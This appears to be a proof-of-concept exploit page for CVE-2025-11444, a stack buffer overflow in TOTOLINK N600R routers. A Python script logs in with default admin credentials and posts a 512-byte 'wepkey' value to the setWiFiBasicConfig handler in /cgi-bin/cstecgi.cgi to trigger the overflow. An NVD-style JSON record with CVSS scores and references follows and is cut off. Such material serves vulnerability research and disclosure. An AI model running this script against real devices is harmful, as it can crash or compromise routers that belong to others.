CVE-2025-11444

# CVE-2025-11444 PoC - TOTOLINK N600R setWiFiBasicConfig Buffer Overflow # Vulnerability: Buffer overflow via wepkey parameter in setWiFiBasicConfig function # Affected: TOTOLINK N600R <= 4.3.0cu.7866_B20220506 # File: /cgi-bin/cstecgi.cgi import requests import sys TARGET_URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi" # Buffer overflow payload - adjust offset based on target binary # The wepkey parameter is vulnerable to stack buffer overflow PAYLOAD = "A" * 512 # Oversized wepkey value to trigger overflow def exploit(target_ip, username="admin", password="admin"): """ Exploit CVE-2025-11444: Buffer overflow in setWiFiBasicConfig via wepkey parameter """ url = f"http://{target_ip}/cgi-bin/cstecgi.cgi" # Step 1: Authenticate to obtain session cookie (low privilege required) session = requests.Session() login_data = { "username": username, "password": password, "login": "1" } session.post(url, data=login_data) # Step 2: Send malicious request with oversized wepkey parameter # The setWiFiBasicConfig function processes wepkey without proper bounds checking exploit_data = { "topicurl": "setWiFiBasicConfig", "wepkey": PAYLOAD, # Trigger buffer overflow "wepkeytype": "1", "wepkeylen": "64" } headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"http://{target_ip}/" } response = session.post(url, data=exploit_data, headers=headers) print(f"[*] Exploit sent. Status: {response.status_code}") return response if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1" exploit(target)

{"cve": {"id": "CVE-2025-11444", "sourceIdentifier": "[email protected]", "published": "2025-10-08T08:15:32.917", "lastModified": "2025-10-14T20:16:01.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in TOTOLINK N600R up to 4.3.0cu.7866_B20220506. This impacts the function setWiFiBasicConfig of the file /cgi-bin/cstecgi.cgi of the component HTTP Request Handler. Such manipulation of the argument wepkey leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:n600r_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.3.0cu.7866_b2022506", "matchCriteriaId": "302BA11E-A5BB-4193-BDE5-312E9E7863F4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:n600r:-:*:*:*:*:*:*:*", "matchCriteriaId": "601C2FBE-B584-40B9-BBD7-7BF2A14CA694"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/TOTOLINK/wepkey/wepkey.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/TOTOLINK/wepkey/wepkey.md#reproduce", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.327381", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327381", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666915", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.totolink.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/TOTOLINK/wepkey/wepkey.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/TOTOLINK/wepkey/wepkey.md#reproduce", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Expl ... (truncated)